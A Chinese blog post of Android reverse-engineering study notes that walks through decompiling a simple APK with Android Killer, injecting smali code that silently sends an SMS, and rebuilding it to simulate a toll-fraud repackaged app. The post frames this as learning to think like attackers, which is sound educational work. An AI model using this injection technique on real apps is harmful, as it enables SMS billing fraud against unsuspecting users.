安卓软件安全与逆向分析学习笔记破解一个小Demo

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/u013821237/article/details/78040739
今天做一个模拟非法破解游戏过程的小Demo,目的在于熟悉一下制作乱扣费软件的思路和流程。相信这种软件大家都见过,安装这些软件后,软件后台会自动下载其他病毒软件/文件,或者偷偷发送扣费短信等。
分析前准备:
安卓开发环境(包括JDK、SDK、Eclipse、AndroidStudio或者其他IDE工具);
Android Killer(将APK反编译的工具,同时具备重新编译、签名等功能);
完整思路:

使用MyEclipse(其他亦可)编写一个简单的APP命名为Test1,Test1代表尚未被修改的正常游戏(应用),Test1只有一个按钮,且动作监听里没有写任何内容,代码如下:

为了方便测试,manifest文件里我们提供发短信权限,虽然暂时没用:
  <uses-permission android:name="android.permission.SEND_SMS"/>
    Button button=(Button)findViewById(R.id.button);
        button.setOnClickListener(new OnClickListener() {
            
            @Override
            public void onClick(View v) {
                
            }
        })

编译Test1生成apk。

接下来,我们通过反编译,将Test1修改为点击按钮发送短信。

将Test1的APK文件导入AndroidKiller,发现,代码全部变成以.smali为尾缀的文件,结构如下:





      找到MainActivity$1.smali文件,该文件即是Test1项目中的MainActivity里的点击事件。只要对该文件中的按钮点击事件(onClick)修改,即可达到添加发送短信的需求。双击打开该文件,显示的是smali语法,对smali语法十分熟悉的同学可以直接读懂代码并对其进行修改,但是我目前只懂得一些简单的语法和规则,没有能力直接修改smali代码来增加发短信的功能.所以这里我采用编写一个发短信代码,对代码编译后再反编译生成需要的smali代码,逻辑如下:
            
发送短信Java代码---->.smali代码---->拷贝并植入Test1


所以,再编写一个自动发送短信的APP命名为Test2,Test2在onCreate里执行发送短信的代码,模拟乱扣费APP,我们把发送扣费短信的代码单独放在一个Send类里,代码如下:
需要在Mainefest文件里添加发短信权限。

publicclasssend {

           publicvoidsendmsg(){
                SmsManagersmsMgr= SmsManager.getDefault(); 
                smsMgr.sendTextMessage("填写电话号码",null,"短信内容",null,null);
                
           
     }
}

再在Test2的OnCreate直接调用:
@Override
     protectedvoidonCreate(BundlesavedInstanceState) {
           super.onCreate(savedInstanceState);
           setContentView(R.layout.activity_main);    
           newsend().sendmsg();
     }

代码很简单,我们看下Test2的运行后短信发送是否成功:



可见代码是可以发送出去的。

Android Killer导入Test2,打开smali包找到send.smali和MainActivity.smali如下图所示:




将send.smali拷贝到Test1的对应目录下,注意,这里的对应目录是指和在Test2里一样的目录即com.example.test2下,没有的话需要新建。这是因为smali的类的使用都是带有完整路径的,与其修改smali代码引用,不如按照原有代码新建目录,在处理复杂代码时尤为有效。
拷贝send.smali到对应目录后,打开Test2的MainActivity.smali,拷贝调用send的代码,如果对smali不熟悉,可以点击转换为Java代码的按钮,这样就可以以java代码的方式查找了。


找到如下所示的代码,该代码即是new send().sendmsg();



拷贝到Test1的动作监听onClick里(文件是MainActivity$1.smali),如下所示:

.method public onClick(Landroid/view/View;)V
    .locals 1
    .param p1, "v"    # Landroid/view/View;
     new-instance v0, Lcom/example/test1/send;
    invoke-direct {v0}, Lcom/example/test1/send;-><init>()V
    invoke-virtual {v0}, Lcom/example/test1/send;->sendmsg()V
    .prologue
    .line 26
    return-void
.end method

细心地同学会发现,该方法的.locals 0变成了 locals 1。locals代表局部变量。这里我们执行了new send().sendmsg();新建了一个对象,所以对应的locals 要+1。

到此,代码植入结束,重新编译得到xxxx-killer.apk,运行,点击按钮,短信发送成功。





总结:
这次小Demo是从一个破解者的角度出发的,从事非法破解工作的人大都是下载一个正常的APK(如Test1.apk),通过反编译,向其中添加病毒、扣费、广告等再重新发布出去。为了保证自己的软件不被非法利用,我们应该站在对方的角度思考软件安全的问题。
在安卓6.0之后,权限都是动态申请的,对于发送短信,我们一般会及时的收到提示,除非已经授权或者授予了root权限,安全性得到了很大的提升。但是,抛砖引玉,如果apk不是通过短信,而是网络链接扣费或者别的方式危害手机,我们分析的思路应该是相同的。
后面是浩瀚的知识海洋,起航!与君共勉!
刚开始写,肯定有很多问题和错误,希望各位积极指正,谢谢。全军出击(((ꎤ'ω')و三 ꎤ'ω')-o≡
展开阅读全文

没有更多推荐了,返回首页